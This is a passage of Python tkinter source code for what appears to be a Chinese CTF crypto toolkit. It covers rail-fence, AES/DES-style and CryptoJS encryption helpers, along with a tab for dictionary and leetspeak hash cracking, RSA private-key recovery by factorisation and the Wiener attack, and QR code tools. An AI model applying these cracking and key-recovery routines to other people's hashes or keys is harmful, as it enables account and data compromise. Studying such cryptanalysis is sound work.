Label(fxpy0052, text='a').pack(side=tkinter.RIGHT)
cbxbaconver = Combobox(fxpy0052,width=3,state='readonly')
cbxbaconver['values'] = ['v1', 'v2']
cbxbaconver.current(0)
cbxbaconver.pack(fill=tkinter.X,side=tkinter.RIGHT)
# 栅栏加解密
fxpy0090 = Frame(ff0)
fxpy0090.pack(side=tkinter.TOP,fill=tkinter.X)
fxpy0092 = Frame(fxpy0090)
fxpy0092.pack(side=tkinter.TOP,fill=tkinter.X)
def _rail_fence_encode(*a):
data = ftxt.get(0.,tkinter.END).strip()
_num = rail_num.get().strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pyrail_fence
except:
import pyrail_fence
try:
_num = int(_num)
v, _ = pyrail_fence.rail_fence_enc(data, _num)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _rail_fence_decode(*a):
data = ftxt.get(0.,tkinter.END).strip()
_num = rail_num.get().strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pyrail_fence
except:
import pyrail_fence
try:
_num = int(_num)
v = pyrail_fence.rail_fence_dec(data, _num)
print(v)
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _rail_fence_enum(*a):
data = ftxt.get(0.,tkinter.END).strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pyrail_fence
except:
import pyrail_fence
try:
v = pyrail_fence.rail_fence_enum(data)
if not v:
print('cannot factorize. by len(string):{}'.format(len(data)))
return
for a,b,r in v:
print('{:>2} --- {}'.format(a, r))
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _rail_fence_enummatrix(*a):
data = ftxt.get(0.,tkinter.END).strip()
ftxt.delete(0.,tkinter.END)
try:
from . import pyrail_fence
except:
import pyrail_fence
try:
v = pyrail_fence.rail_fence_enum(data, return_matrix=True)
if not v:
print('cannot factorize. by len(string):{}'.format(len(data)))
return
for a,b,i in v:
print('--- {}x{} ---'.format(a,b))
for j in i:
r = ''
for k in list(j):
r += k + ' '
print(r.strip())
# re.sub("''")
except:
ftxt.delete(0.,tkinter.END)
print(traceback.format_exc())
print('error decoding!!! check input data.')
def _rail_fence_code(*a):
try:
from . import pyrail_fence
except:
import pyrail_fence
ftxt.delete(0.,tkinter.END)
with open(pyrail_fence.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fxpy0092, text='[算法]',command=_rail_fence_code,width=5).pack(side=tkinter.LEFT)
Label(fxpy0092, text=' 这里为 栅栏密码 算法加解密。').pack(side=tkinter.LEFT)
Button(fxpy0092, text='遍历矩阵',command=_rail_fence_enummatrix,width=8).pack(side=tkinter.RIGHT)
Button(fxpy0092, text='遍历',command=_rail_fence_enum,width=5).pack(side=tkinter.RIGHT)
Button(fxpy0092, text='解密',command=_rail_fence_decode,width=5).pack(side=tkinter.RIGHT)
Button(fxpy0092, text='加密',command=_rail_fence_encode,width=5).pack(side=tkinter.RIGHT)
rail_num = Entry(fxpy0092, width=2)
rail_num.insert(0, '2')
rail_num.pack(side=tkinter.RIGHT)
Label(fxpy0092, text='栅栏数').pack(side=tkinter.RIGHT)
_fr1 = Frame(fr)
enb.add(_fr1, text='依赖库加解密')
enb.pack()
enb_names[_fr1._name] = '依赖库加解密'
ff1 = Frame(_fr1)
ff1.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
ff1_ = Frame(_fr1)
ff1_.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
txttitlefr = Frame(ff1_)
txttitlefr.pack(side=tkinter.TOP)
Label(txttitlefr, text='使用以下文本框进行加解密 [仅忽略文本前后换行符,空格不忽略],显示限制字符数:').pack(side=tkinter.LEFT,padx=10)
entlimit2 = Entry(txttitlefr, width=10)
entlimit2.pack(side=tkinter.LEFT)
entlimit2.insert(0,'10000')
ctxt = Text(ff1_,font=ft)
ctxt.pack(padx=padx,pady=pady,fill=tkinter.BOTH,expand=True)
# 这里依赖于 cryptography 库的加解密算法,这里会比以上从各种地方收集来的纯py代码要更加保险
cryptographyhelps = '''
以下算法为依赖于 cryptography 库
由于使用了一个比较成熟的加密函数库,所以基本包含了常用的加解密算法
如有安装该加密库,则请尽量使用该库的算法实现。
不过还是有部分例如 twofish 以及 serpent 这里没有,在纯py算法中有实现。
#[*] AES len(key) [128, 192, 256, 512] len(iv) 128
#[*] Camellia len(key) [128, 192, 256] len(iv) 128
#[*] SEED len(key) [128] len(iv) 128
# ChaCha20 len(key) [256] len(iv) 128 (nonce)
#[*] Blowfish len(key) range(32, 449, 8) len(iv) 64
#[*] CAST5 len(key) range(40, 129, 8) len(iv) 64
#[*] IDEA len(key) [128] len(iv) 64
#[*] TripleDES len(key) [64, 128, 192] len(iv) 64
#[*] DES len(key) [64, 128, 192] len(iv) 64
# ARC4 len(key) [40, 56, 64, 80, 128, 160, 192, 256] # 不使用iv
带有 [*] 的可以有不同的加密模式(cbc,ecb...),没有的,则该选项无效。
'''.strip('\n')
def f900_change_cbit_1(*content):
if content:
encd = f9001_fent1.get().strip()
blen = len(content[0].encode(encd))*8
f9001_cbit1['text'] = str(blen)+'bit'
return True
def f900_change_cbit_2(*content):
if content:
encd = f9001_fent1.get().strip()
blen = len(content[0].encode(encd))*8
f9002_cbit2['text'] = str(blen)+'bit'
return True
f900_change_cbit1 = root.register(f900_change_cbit_1)
f900_change_cbit2 = root.register(f900_change_cbit_2)
f9000 = Frame(ff1)
f9000.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f9000, text=cryptographyhelps,font=ft).pack(fill=tkinter.X,expand=True)
f9001 = Frame(ff1)
f9001.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f9001, text='密码',width=4).pack(side=tkinter.LEFT,padx=2)
f90001_ent1 = Entry(f9001,width=17,validate='key',validatecommand=(f900_change_cbit1, '%P'))
f90001_ent1.pack(side=tkinter.LEFT)
f90001_ent1.bind('<Key>', f900_change_cbit1)
f9001_cbit1 = Label(f9001, text='0bit',width=6)
f9001_cbit1.pack(side=tkinter.LEFT,padx=6)
f9001_mode1 = Combobox(f9001,width=4,state='readonly')
f9001_mode1['values'] = ['b16','b32','b64','b85']
f9001_mode1.current(2)
f9001_mode1.pack(side=tkinter.RIGHT)
Label(f9001, text='编码',width=4).pack(side=tkinter.RIGHT,padx=5)
def _f900swich_encd1(*a):
s = f9001_fent1.get().strip()
if s == 'utf-8':
f9001_fent1.delete(0,tkinter.END)
f9001_fent1.insert(0,'gbk')
elif s == 'gbk':
f9001_fent1.delete(0,tkinter.END)
f9001_fent1.insert(0,'utf-8')
else:
f9001_fent1.delete(0,tkinter.END)
f9001_fent1.insert(0,'utf-8')
f900_change_cbit_1(f90001_ent1.get().strip())
f900_change_cbit_2(f90002_ent2.get().strip())
f9001_fent1 = Entry(f9001,width=5)
f9001_fent1.insert(0,'utf-8')
f9001_fent1.pack(side=tkinter.RIGHT)
Button(f9001, text='编码格式',command=_f900swich_encd1, width=7).pack(side=tkinter.RIGHT)
f9001_mode2 = Combobox(f9001,width=4,state='readonly')
f9001_mode2['values'] = ['cbc','cfb','ofb','ctr','ecb',]
f9001_mode2.current(0)
f9001_mode2.pack(side=tkinter.RIGHT)
Label(f9001, text='模式',width=4).pack(side=tkinter.RIGHT,padx=5)
Label(f9001, text='加密',).pack(side=tkinter.LEFT,padx=2)
f9001_mode3 = Combobox(f9001,width=6,state='readonly')
f9001_mode3['values'] = ['AES', 'ARC4', 'Blowfish', 'CAST5', 'Camellia', 'ChaCha20', 'IDEA', 'SEED', 'TripleDES', 'DES']
f9001_mode3.current(0)
f9001_mode3.pack(side=tkinter.LEFT)
f9002 = Frame(ff1)
f9002.pack(side=tkinter.TOP,fill=tkinter.X)
Label(f9002, text='iv',width=4).pack(side=tkinter.LEFT,padx=2)
f90002_ent2 = Entry(f9002,width=17,validate='key',validatecommand=(f900_change_cbit2, '%P'))
f90002_ent2.pack(side=tkinter.LEFT)
f9002_cbit2 = Label(f9002, text='128:bit',width=6)
f9002_cbit2.pack(side=tkinter.LEFT,padx=6)
f90002_ent2.insert(0,'1234567890123456')
Label(f9002, text='PADDING',).pack(side=tkinter.LEFT,padx=2)
f9002_mode4 = Combobox(f9002,width=7,state='readonly')
f9002_mode4['values'] = ['PKCS7', 'ANSIX923', 'None',]
f9002_mode4.current(0)
f9002_mode4.pack(side=tkinter.LEFT)
def _pymultialgo_encode(*a):
encd = f9001_fent1.get().strip()
mode = f9001_mode2.get().strip()
eout = f9001_mode1.get().strip()
key = f90001_ent1.get().strip().encode(encd)
iv = f90002_ent2.get().strip().encode(encd)
algo = f9001_mode3.get().strip()
padd = f9002_mode4.get().strip()
data = ctxt.get(0.,tkinter.END).strip('\n').encode(encd)
limitnum = int(entlimit2.get().strip())
ctxt.delete(0.,tkinter.END)
try:
from . import pymultialgo
except:
# 请勿在本脚本测试时安装了 pyaes,pyaes的源码部分有问题
import pymultialgo
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
try:
encryptor = pymultialgo.get_encryptor(algo, key, iv, mode, padd)
edata = encryptor.encrypt(data)
en = _encode(edata).decode(encd)
if len(en) > limitnum:
print('警告!')
print('加密数据长度({})过长(超过{}字符,超过的部分不显示)'.format(len(en),limitnum))
print('因为 tkinter 性能瓶颈,不宜在 tkinter 窗口展示,请使用算法在别的IDE内实现')
print('---------------------------------------------------')
print(en[:limitnum])
else:
print(en)
except:
print(traceback.format_exc())
def _pymultialgo_decode(*a):
encd = f9001_fent1.get().strip()
mode = f9001_mode2.get().strip()
eout = f9001_mode1.get().strip()
key = f90001_ent1.get().strip().encode(encd)
iv = f90002_ent2.get().strip().encode(encd)
algo = f9001_mode3.get().strip()
padd = f9002_mode4.get().strip()
data = ctxt.get(0.,tkinter.END).strip('\n').encode(encd)
ctxt.delete(0.,tkinter.END)
try:
from . import pymultialgo
except:
# 请勿在本脚本测试时安装了 pyaes,pyaes的源码部分有问题
import pymultialgo
if eout == 'b16':_encode = base64.b16encode; _decode = base64.b16decode
if eout == 'b32':_encode = base64.b32encode; _decode = base64.b32decode
if eout == 'b64':_encode = base64.b64encode; _decode = base64.b64decode
if eout == 'b85':_encode = base64.b85encode; _decode = base64.b85decode
try:
encryptor = pymultialgo.get_encryptor(algo, key, iv, mode, padd)
dc = encryptor.decrypt(_decode(data)).decode(encd)
print(dc)
except:
print(traceback.format_exc())
def _pymultialgo_code(*a):
try:
from . import pymultialgo
except:
import pymultialgo
ctxt.delete(0.,tkinter.END)
with open(pymultialgo.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(f9002, text='[算法]',command=_pymultialgo_code,width=5).pack(side=tkinter.RIGHT)
Button(f9002, text='解密',command=_pymultialgo_decode,width=5).pack(side=tkinter.RIGHT)
Button(f9002, text='加密',command=_pymultialgo_encode,width=5).pack(side=tkinter.RIGHT)
fevpkdflab = '''
以 U2FsdGVkX1 开头的加密数据相关
该种类的加密方式为 cryptojs 的默认加密方式,在某种程度上只需要密码即可解密
但是实际上使用的却是 CBC 模式(该模式需要设置偏移 iv参数)。
并且每次加密都能加密出不同的密文数据,但是却用密码都能解密出相同的原始数据,
目前这里暂时只提供了加解密算法代码。
加密算法伪代码:
salt <= os.urandom(8)
key,iv <= EvpKDF(realkey, salt) # 这里有简化,详细请看代码
encodedata <= encrypt(key, iv, CBC, data) # 通常为 cbc/pkcs7
result <= base64('Salted__' + salt + encodedata)
1) 生成随机盐
2) 通过真实 key 与盐算出固定加密用的 key,iv
3) 使用加密算法加密数据
4) 将标识头(Salted__)、盐和加密数据打包并进行 base64 就是加密数据,
因为标识头都是一样的,所以一般都是以 U2FsdGVkX1 开头的加密数据
'''.rstrip('\n')
fevpkdf0 = Frame(ff1)
fevpkdf0.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fevpkdf0, text=fevpkdflab,font=ft).pack(fill=tkinter.X,expand=True)
fevpkdf1 = Frame(ff1)
fevpkdf1.pack(side=tkinter.TOP,fill=tkinter.X)
fevpkdf2 = Frame(fevpkdf1)
fevpkdf2.pack(side=tkinter.TOP,fill=tkinter.X)
def _evpkdf_code(*a):
try:
from . import pyevpkdf
except:
import pyevpkdf
ctxt.delete(0.,tkinter.END)
with open(pyevpkdf.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Button(fevpkdf2, text='[算法]',command=_evpkdf_code,width=5).pack(side=tkinter.RIGHT)
_fss1 = Frame(fr)
enb.add(_fss1, text='爆破;RSA;二维码')
enb.pack()
enb_names[_fss1._name] = '爆破;RSA;二维码'
fss1 = Frame(_fss1)
fss1.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
fss1_ = Frame(_fss1)
fss1_.pack(side=tkinter.LEFT,fill=tkinter.BOTH,expand=True)
txttitlefss = Frame(fss1_)
txttitlefss.pack(side=tkinter.TOP)
Label(txttitlefss, text='使用以下文本框进行输出').pack(side=tkinter.LEFT,padx=10)
fssentlimit2 = Entry(txttitlefss, width=10)
fssentlimit2.pack(side=tkinter.LEFT)
fssentlimit2.insert(0,'10000')
fsstxt = Text(fss1_,font=ft)
fsstxt.pack(padx=padx,pady=pady,fill=tkinter.BOTH,expand=True)
bhashhelp = '''
hash 爆破
该算法会自动使用一定程度的黑客语(leetspeak)对密码进行膨胀处理,详细的处理请参考算法。
若想使用自己的字典,可以直接将字典内容粘贴到右侧窗口中,点击[自定义爆破]即可
会自动使用选择的算法进行 hash 的对比。
另外,算法内还有名字前缀以及日期的组合,没有放在该功能中,如果有更详细的需求
请直接点开算法,使用别的ide进行更丰富的爆破处理。
'''.rstrip('\n')
# 这里是 twofish 算法的部分
def fbx_change_cbit_1(*content):
if content:
blen = len(content[0])
fbx_cbit1['text'] = str(blen)
return True
fbx_change_cbit1 = root.register(fbx_change_cbit_1)
fbx100 = Frame(fss1)
fbx100.pack(side=tkinter.TOP,fill=tkinter.X)
fbx101 = Frame(fbx100)
fbx102 = Frame(fbx100)
fbx103 = Frame(fbx100)
fbx101.pack(side=tkinter.TOP,fill=tkinter.X)
fbx102.pack(side=tkinter.TOP,fill=tkinter.X)
fbx103.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fbx101, text=bhashhelp, font=ft).pack(fill=tkinter.X,expand=True)
def _pymapmd5_decode(*a):
_hash = fbxent.get().strip()
_mode = fbx1_mode1.get()
fsstxt.delete(0.,tkinter.END)
try:
from . import pymapmd5, pymd2
except:
import pymapmd5, pymd2
try:
if _mode == 'md2':
hfunc = pymd2.md2
else:
hfunc = lambda i:hashlib.new(_mode, i).hexdigest()
emptyhash = hfunc(b'')
if len(_hash) != len(emptyhash):
print('非法的hash长度')
print(_mode,'需要的长度为',len(emptyhash))
return
if _hash == emptyhash:
print('空参数的hash。')
return
ctime = time.time()
mk_map_passleet = pymapmd5.mk_map_passleet
zpasslist = mk_map_passleet(pymapmd5.zpasslist)
map_namehead_times = pymapmd5.map_namehead_times
findkey = False
for i in itertools.chain(zpasslist, map_namehead_times()):
v = hfunc(i.encode())
if v == _hash:
findkey = (v, i)
break
if findkey:
print('发现密码:')
print('password:',i)
print('hash:',v)
else:
print('未找到密码')
print('使用时间:',time.time()-ctime)
except:
fsstxt.delete(0.,tkinter.END)
print(traceback.format_exc())
def _inputdict_map(*a):
_hash = fbxent.get().strip()
_mode = fbx1_mode1.get()
_list = fsstxt.get(0.,tkinter.END).strip('\n').splitlines()
fsstxt.delete(0.,tkinter.END)
try:
from . import pymapmd5, pymd2
except:
import pymapmd5, pymd2
try:
if _mode == 'md2':
hfunc = pymd2.md2
else:
hfunc = lambda i:hashlib.new(_mode, i).hexdigest()
emptyhash = hfunc(b'')
mk_map_passleet = pymapmd5.mk_map_passleet
if len(_hash) != len(emptyhash):
print('非法的hash长度')
print(_mode,'需要的长度为',len(emptyhash))
return
if _hash == emptyhash:
print('空参数的hash。')
return
ctime = time.time()
findkey = False
for i in mk_map_passleet(_list):
v = hfunc(i.encode())
if v == _hash:
findkey = (v, i)
break
if findkey:
print('发现密码:')
print('password:',i)
print('hash:',v)
else:
print('未找到密码')
print('使用时间:',time.time()-ctime)
except:
fsstxt.delete(0.,tkinter.END)
print(traceback.format_exc())
def _pymapmd5_code(*a):
try:
from . import pymapmd5
except:
import pymapmd5
fsstxt.delete(0.,tkinter.END)
with open(pymapmd5.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
Label(fbx102, text='参数',width=4).pack(side=tkinter.LEFT,padx=5)
fbxent = Entry(fbx102, width=41,validate='key',validatecommand=(fbx_change_cbit1, '%P'))
fbxent.pack(side=tkinter.LEFT)
fbxent.bind('<Key>', fbx_change_cbit1)
# fbxent.pack(side=tkinter.LEFT)
fbx1_mode1 = Combobox(fbx102,width=12,state='readonly')
fbx1_mode1['values'] = ['md5', 'sha1', 'blake2b', 'blake2s', 'md2', 'md4', 'ripemd160', 'sha', \
'sha224', 'sha256', 'sha384', 'sha3_224', 'sha3_256', 'sha3_384', \
'sha3_512', 'sha512', 'whirlpool']
fbx1_mode1.current(0)
fbx1_mode1.pack(side=tkinter.RIGHT)
fbx_cbit1 = Label(fbx102, text='0',width=4)
fbx_cbit1.pack(side=tkinter.LEFT,padx=5)
Label(fbx102, text='hash',width=4).pack(side=tkinter.RIGHT,padx=5)
Button(fbx103, text='[算法]',command=_pymapmd5_code,width=5).pack(side=tkinter.RIGHT)
Button(fbx103, text='快速爆破',command=_pymapmd5_decode,width=8).pack(side=tkinter.RIGHT)
Button(fbx103, text='自定义爆破',command=_inputdict_map,width=10).pack(side=tkinter.RIGHT)
sshelp = '''
一些关于素数的内容
以下一开始就在输入框的的内容均是测试内容
e=65537=0x10001 是常用的的 rsa 加密标准的通用初始值,
如果有需要自定义,请自行填入一个素数
'''.strip('\n')
fss001 = Frame(fss1)
fss001.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss001, text=sshelp,font=ft).pack(fill=tkinter.X,expand=True)
def css002(*a):
try:
from . import pyprime
except:
import pyprime
fsstxt.delete(0.,tkinter.END)
try:
num = int(ess002.get())
if num > 1030:
print('目前不支持生成超过 1030bit 位的素数。')
return
en = str(pyprime.get_prime(num))
print(en)
except:
print(traceback.format_exc())
fss002 = Frame(fss1)
fss002.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss002,text='bit位',font=ft,width=6).pack(side=tkinter.LEFT)
ess002 = Entry(fss002,width=40)
ess002.pack(side=tkinter.LEFT)
ess002.insert(0, '30')
bss002 = Button(fss002,text='生成 n bit位素数',command=css002)
bss002.pack(side=tkinter.LEFT,padx=2)
def css002_1(*a):
try:
from . import pyprime
except:
import pyprime
fsstxt.delete(0.,tkinter.END)
try:
num = int(ess002_1.get())
if pyprime.isprime_mr(num):
print('{} 是素数。'.format(num))
else:
print('{} 不是素数。'.format(num))
except:
print(traceback.format_exc())
fss002_1 = Frame(fss1)
fss002_1.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss002_1,text='数字',font=ft,width=6).pack(side=tkinter.LEFT)
ess002_1 = Entry(fss002_1,width=40)
ess002_1.pack(side=tkinter.LEFT)
ess002_1.insert(0, '30')
bss002_1 = Button(fss002_1,text='素性检测',command=css002_1)
bss002_1.pack(side=tkinter.LEFT,padx=2)
def css003(*a):
fsstxt.delete(0.,tkinter.END)
try:
print(hex(int(ess003.get()))[2:].upper())
except:
print(traceback.format_exc())
fss003 = Frame(fss1)
fss003.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss003,text='数字',font=ft,width=6).pack(side=tkinter.LEFT)
ess003 = Entry(fss003,width=40)
ess003.pack(side=tkinter.LEFT)
ess003.insert(0, '123456789012345678901234567890')
bss003 = Button(fss003,text='数字转字符串',command=css003)
bss003.pack(side=tkinter.LEFT,padx=2)
def css004(*a):
fsstxt.delete(0.,tkinter.END)
try:
print(int(ess004.get(),16))
except:
print(traceback.format_exc())
fss004 = Frame(fss1)
fss004.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss004,text='字符串',font=ft,width=6).pack(side=tkinter.LEFT)
ess004 = Entry(fss004,width=40)
ess004.pack(side=tkinter.LEFT)
ess004.insert(0, '16704F4FAB27EC51A071C71C7')
bss004 = Button(fss004,text='字符串转数字',command=css004)
bss004.pack(side=tkinter.LEFT,padx=2)
def css005(*a):
try:
from . import pyprime
except:
import pyprime
fsstxt.delete(0.,tkinter.END)
try:
num = int(ess005.get())
if not pyprime.isprime_mr(num):
print('e 必须是一个素数。')
return
num2 = int(ess005_2.get())
if num2 > 2050:
print('当前的密钥 n bit长度不能超过2050.')
return
e,d,n = pyprime.create_rsa_key(num2, num)
ess006.delete(0,tkinter.END)
ess006.insert(0,str(n))
ess007.delete(0,tkinter.END)
ess007.insert(0,str(d))
print('e:',e)
print('d:',d)
print('n:',n)
print()
print('密钥n bit位长度:',len(bin(n)[2:]))
print('e,n 就是公钥')
print('d,n 就是私钥')
except:
print(traceback.format_exc())
fss005 = Frame(fss1)
fss005.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss005,text='e',font=ft,width=6).pack(side=tkinter.LEFT)
ess005 = Entry(fss005,width=40)
ess005.pack(side=tkinter.LEFT)
ess005.insert(0,'65537')
bss005 = Button(fss005,text='生成rsa密钥对,密钥n的bit位:',command=css005)
bss005.pack(side=tkinter.LEFT,padx=2)
ess005_2 = Entry(fss005,width=5)
ess005_2.pack(side=tkinter.LEFT)
ess005_2.insert(0,'1024')
def css006(*a):
try:
from . import pyprime
except:
import pyprime
try:
dataint = int(fsstxt.get(0.,tkinter.END))
fsstxt.delete(0.,tkinter.END)
e = int(ess005.get())
n = int(ess006.get())
print(pow(dataint, e, n))
except:
print(traceback.format_exc())
fss006 = Frame(fss1)
fss006.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss006,text='n',font=ft,width=6).pack(side=tkinter.LEFT)
ess006 = Entry(fss006,width=40)
ess006.pack(side=tkinter.LEFT)
bss006 = Button(fss006,text='使用e,n对右侧数字进行rsa加密',command=css006)
bss006.pack(side=tkinter.LEFT,padx=2)
def css007(*a):
try:
from . import pyprime
except:
import pyprime
try:
dataint = int(fsstxt.get(0.,tkinter.END))
fsstxt.delete(0.,tkinter.END)
d = int(ess007.get())
n = int(ess006.get())
print(pow(dataint, d, n))
except:
print(traceback.format_exc())
fss007 = Frame(fss1)
fss007.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss007,text='d',font=ft,width=6).pack(side=tkinter.LEFT)
ess007 = Entry(fss007,width=40)
ess007.pack(side=tkinter.LEFT)
bss007 = Button(fss007,text='使用d,n对右侧数字进行rsa解密',command=css007)
bss007.pack(side=tkinter.LEFT,padx=2)
def css009(*a):
try:
from . import pyprime
except:
import pyprime
fsstxt.delete(0.,tkinter.END)
try:
num = int(ess009.get())
plist = pyprime.prime_list_rho(num)
print(plist)
r = 1
for i in plist:
r *= i
print('原始数据:',num)
print('验算结果:',str(r))
except:
print(traceback.format_exc())
fss009 = Frame(fss1)
fss009.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss009,text='数字',font=ft,width=6).pack(side=tkinter.LEFT)
ess009 = Entry(fss009,width=40)
ess009.pack(side=tkinter.LEFT)
bss009 = Button(fss009,text='质因数分解',command=css009)
bss009.pack(side=tkinter.LEFT,padx=2)
def css0014(*a):
try:
from . import pyprime
except:
import pyprime
fsstxt.delete(0.,tkinter.END)
try:
e = int(ess005.get())
n = int(ess006.get())
print('注意:p,q 中的最小值的 bit 长度应大约小于40(经验判断),否则程序卡死。')
fsstxt.update()
d, p, q = pyprime.get_d_from_e_n(e, n)
print('p:',p)
print('q:',q)
print()
print('计算结果d:', d)
ess007.delete(0,tkinter.END)
ess007.insert(0,str(d))
except:
print(traceback.format_exc())
fss0014 = Frame(fss1)
fss0014.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss0014,text='n因式分解条件:n==p*q; min(p,q)的bit长度大约在40或更小,否则程序卡死',font=ft).pack(side=tkinter.LEFT)
bss0014 = Button(fss0014,text='通过e,n直接解出参数d',command=css0014)
bss0014.pack(side=tkinter.RIGHT,padx=2)
def css008(*a):
try:
from . import pywiener_attack
except:
import pywiener_attack
fsstxt.delete(0.,tkinter.END)
try:
e = int(ess005.get())
n = int(ess006.get())
v = str(pywiener_attack.wiener_attack(e, n))
if v.startswith('Error'):
print('使用的e参数:',e)
print('使用的n参数:',n)
print()
print('wiener attack 算法攻击未成功。')
else:
print('使用的e参数:',e)
print('使用的n参数:',n)
print()
print('wiener attack 算法攻击成功。')
print('算出的 d 参数为:',v)
except:
print(traceback.format_exc())
fss008 = Frame(fss1)
fss008.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss008,text='当e很大,且d很小,这时可通过 wiener-attack 算法用e,n解密出d',font=ft).pack(side=tkinter.LEFT)
bss008 = Button(fss008,text='使用e,n进行算法攻击',command=css008)
bss008.pack(side=tkinter.RIGHT,padx=2)
def _pyprime_code(*a):
try:
from . import pyprime
except:
import pyprime
fsstxt.delete(0.,tkinter.END)
with open(pyprime.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
def _pywiener_attck_code(*a):
try:
from . import pywiener_attack
except:
import pywiener_attack
fsstxt.delete(0.,tkinter.END)
with open(pywiener_attack.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
fss0010 = Frame(fss1)
fss0010.pack(side=tkinter.TOP,fill=tkinter.X)
bss0010 = Button(fss0010,text='素数与rsa相关算法',command=_pyprime_code)
bss0010.pack(side=tkinter.RIGHT,padx=2)
bss0010_2 = Button(fss0010,text='wiener-attack算法',command=_pywiener_attck_code)
bss0010_2.pack(side=tkinter.RIGHT,padx=2)
sshelp = '''
关于二维码的加解密
解密:
使用解密时,需要将图片打开,解密功能会自动将桌面截图,
也可以直接使用截图解密,这样可以更加精准的定位数据。
當然,你可以选择使用脚本进行自定义的处理。
加密:
在加密中中文的加密有时会因为zbar的问题解码成无意义的日文或乱码。
请确认解码的正常后再使用加密的二维码,
解决方式可以尝试微调一下加密数据。
'''.strip('\n')
fss0011 = Frame(fss1)
fss0011.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss0011, text=sshelp,font=ft).pack(fill=tkinter.X,expand=True)
def css0012(*a):
try:
from . import pypyzbar
except:
import pypyzbar
fsstxt.delete(0.,tkinter.END)
try:
screenshot_bit = pypyzbar.screenshot()
pixbytes, w, h = pypyzbar.create_png_pixel_tobytes(screenshot_bit)
deco = pypyzbar.decode((pixbytes, w, h))
print(time.ctime())
print('开始识别')
if deco:
print('发现{}个二维码并解密:'.format(len(deco)))
print(' <注意:含有中文解密若是在解码中出现乱码问题则该bytes类型数据就已经不可信了>')
for idx,i in enumerate(deco):
print('[ {} ]'.format(idx))
print(' bytes类型展示')
print(' ',i.data)
print(' 尝试简单解码')
try:
print(' ',i.data.decode('utf-8'))
except:
print(' ',i.data.decode('gbk'))
else:
print('未定位到二维码。')
print('识别结束')
except:
print(traceback.format_exc())
def css0012_1(*a):
try:
from . import pypyzbar
except:
import pypyzbar
try:
pixbytes, w, h = pypyzbar.screenshot_rect(root)
deco = pypyzbar.decode((pixbytes, w, h))
fsstxt.delete(0.,tkinter.END)
print(time.ctime())
print('开始识别')
if deco:
print('发现{}个二维码并解密:'.format(len(deco)))
print(' <注意:含有中文解密若是在解码中出现问题则该bytes类型数据就已经不可信了>')
for idx,i in enumerate(deco):
print('[ {} ]'.format(idx))
print(' bytes类型展示')
print(' ',i.data)
print(' 尝试简单解码')
try:
print(' ',i.data.decode('utf-8'))
except:
print(' ',i.data.decode('gbk'))
else:
print('未定位到二维码。')
print('识别结束')
except:
print(traceback.format_exc())
def css0013(*a):
try:
from . import pyqrcode
except:
import pyqrcode
fsstxt.delete(0.,tkinter.END)
try:
enctxt = ess0012.get().strip()
encdlv = cbx_0013.get().strip()
if encdlv == '7%': encdlv = pyqrcode.ERROR_CORRECT_L
if encdlv == '15%': encdlv = pyqrcode.ERROR_CORRECT_M
if encdlv == '25%': encdlv = pyqrcode.ERROR_CORRECT_Q
if encdlv == '30%': encdlv = pyqrcode.ERROR_CORRECT_H
s = pyqrcode.QRCode(error_correction=encdlv)
s.add_data(enctxt.encode('utf-8'))
for i in s.get_matrix():
black = '██'
white = ' '
v = ''.join([black if j else white for j in i])
print(v)
except:
print(traceback.format_exc())
fss0012 = Frame(fss1)
fss0012.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss0012,text='加密',font=ft,width=6).pack(side=tkinter.LEFT)
ess0012 = Entry(fss0012,width=50)
ess0012.pack(side=tkinter.LEFT)
fss0013 = Frame(fss1)
fss0013.pack(side=tkinter.TOP,fill=tkinter.X)
Label(fss0013,text='等级',font=ft,width=6).pack(side=tkinter.LEFT)
cbx_0013 = Combobox(fss0013,width=6,state='readonly')
cbx_0013['values'] = ['7%', '15%', '25%', '30%']
cbx_0013.current(1)
cbx_0013.pack(side=tkinter.LEFT)
bss0013_3 = Button(fss0013,text='截图解密',command=css0012_1,width=9)
bss0013_3.pack(side=tkinter.RIGHT,padx=1)
bss0013_2 = Button(fss0013,text='全屏解密',command=css0012,width=9)
bss0013_2.pack(side=tkinter.RIGHT,padx=1)
bss0013 = Button(fss0013,text='二维码加密',command=css0013,width=9)
bss0013.pack(side=tkinter.RIGHT,padx=1)
def _pyqrcode_code(*a):
try:
from . import pyqrcode
except:
import pyqrcode
fsstxt.delete(0.,tkinter.END)
with open(pyqrcode.__file__, encoding='utf-8') as f:
data = f.read().strip('\n')
print(data)
def _pypyzbar_code(*a):
try:
from . import pypyzbar
